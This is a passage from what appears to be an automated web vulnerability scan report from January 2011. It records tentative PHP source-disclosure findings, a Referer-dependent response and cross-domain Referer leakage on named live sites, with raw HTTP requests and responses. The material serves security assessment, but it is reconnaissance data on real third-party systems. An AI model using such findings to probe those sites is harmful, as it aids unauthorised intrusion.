Confidence:   Tentative
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:17:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<meta name="copyright" content="<?php echo AT_COPYRIGHT_TEXT ?>" />
...[SNIP]...

13.2. http://www.websitedescription.com/msn.whitepages.com

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.websitedescription.com
Path:   /msn.whitepages.com

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /msn.whitepages.com HTTP/1.1
Host: www.websitedescription.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 15:26:52 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.2
Connection: close
Content-Type: text/html
Content-Length: 29956

<?php include 'include.php'; ?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<
...[SNIP]...

13.3. http://www.wired.com/magazine/

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.wired.com
Path:   /magazine/

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /magazine/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/magazine/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 11:23:30 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Wed, 12 Jan 2011 15:39:00 GMT
Date: Wed, 12 Jan 2011 15:39:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</li>


<?php wp_get_archives('type=postbypost&limit=10'); ?>
</ul>
<?php include (TEMPLATEPATH . "/most_recent_entries_supplement.php"); ?>
   </div>
...[SNIP]...

13.4. http://www.wired.com/magazine/ipad

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.wired.com
Path:   /magazine/ipad

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /magazine/ipad HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:28:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:04 GMT
Date: Wed, 12 Jan 2011 15:39:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</li>


<?php wp_get_archives('type=postbypost&limit=10'); ?>
</ul>
<?php include (TEMPLATEPATH . "/most_recent_entries_supplement.php"); ?>
   </div>
...[SNIP]...

13.5. http://www.wired.com/playbook/

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.wired.com
Path:   /playbook/

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /playbook/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:03:45 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=394
Expires: Wed, 12 Jan 2011 15:46:29 GMT
Date: Wed, 12 Jan 2011 15:39:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<img src="<?php bloginfo('template_directory'); ?>/images/envelope.gif" width="14" height="11" border="0" />
...[SNIP]...

14. Referer-dependent response

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.crwdcntrl.net
Path:   /4/to=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defenses against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kind of user-supplied data.

Request 1

GET /4/to=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json?_=1294610289454 HTTP/1.1
Host: ad.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 302 Moved Temporarily
Date: Wed, 12 Jan 2011 03:00:25 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=ctst; Domain=.crwdcntrl.net; Path=/
Location: http://ad.crwdcntrl.net/4/ct=y|ref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F|to=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json?_=1294610289454
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 0

Request 2

GET /4/to=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json?_=1294610289454 HTTP/1.1
Host: ad.crwdcntrl.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Wed, 12 Jan 2011 03:00:25 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=ctst; Domain=.crwdcntrl.net; Path=/
Location: http://ad.crwdcntrl.net/4/ct=y|to=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json?_=1294610289454
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 0


15. Cross-domain Referer leakage
There are 5 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


15.1. http://account.theregister.co.uk/register/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://account.theregister.co.uk
Path:   /register/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /register/?product=security_news HTTP/1.1
Host: account.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:12:29 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 27098

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang=en>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<li>| <a href="http://www.reghardware.com/">Reg Hardware</a>
...[SNIP]...
<li>| <a href="http://www.channelregister.co.uk/">Channel Reg</a>
...[SNIP]...
<li><a href="http://www.channelregister.co.uk/">Channel Register</a>
...[SNIP]...
<li class=last><a href="http://www.reghardware.com/">Register Hardware</a>
...[SNIP]...

15.2. http://ad.uk.doubleclick.net/adj/reg.security.4159/front

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /adj/reg.security.4159/front

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adj/reg.security.4159/front;tile=1;dcove=d;cta=0;ctb=0;ctc=redesign;sc=1;cid=;test=;pid=111484;pf=0;kw=open%20source;kw=encryption;kw=cryptography;kw=software;kw=export%20administration%20regulations;kw=bureau%20of%20industry%20and%20security;cp=0;vc=sec.front;pos=top;dcopt=ist;sz=728x90;ord=671761913? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript; charset=UTF-8
Date: Wed, 12 Jan 2011 15:25:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 12375

var divid='dclkAdsDivID_19530';
document.write('<div id=' + divid + '></div>');
var adsenseHtml_19530 = "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/html4/strict.dtd\"><
...[SNIP]...
<!-- Begin Interstitial Ad -->');

$(function() {
//El Reg Welcome Ad - Reg, LOCAL FLASH script to IFRAME, Jan 2011.

var _REG_WA_displaytime = 18;

var h = 'http://s0.2mdn.net';

var _REG_WA = '<iframe src="http://regmedia.co.uk/2011/01/06/regwa-localflash.html?src='+h+'/1536772/isilon_640x480.swf&gif='+h+'/1536772/isilon_640x480_static.jpg&click=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3a8d/2/0/%2a/i%3B233459349%3B0-0%3B1%3B13500656%3B255-0/0%3B40103662/40121449/1%3B%3B%7Esscs%3D%3fhttp://info.isilon.com/forms/simpleissmart?source=uk_register_640x480_simpleissmart" width="640" height="480" frameborder="0"></iframe>
...[SNIP]...
<div id="REG_WAClose"><a href="http://www.theregister.co.uk/">Continue to The Register - Skip Ad<span>
...[SNIP]...

15.3. https://edit.yahoo.com/registration

Summary

Severity:   Information
Confidence:   Certain
Host:   https://edit.yahoo.com
Path:   /registration

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /registration?.src=fpctx&.intl=us&.done=http://www.yahoo.com/ HTTP/1.1
Host: edit.yahoo.com
Connection: keep-alive
Referer: http://www.yahoo.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=80eipqp6i4psl&b=3&s=j8

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 22:45:53 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 50154


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="en-US">
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">    
 &n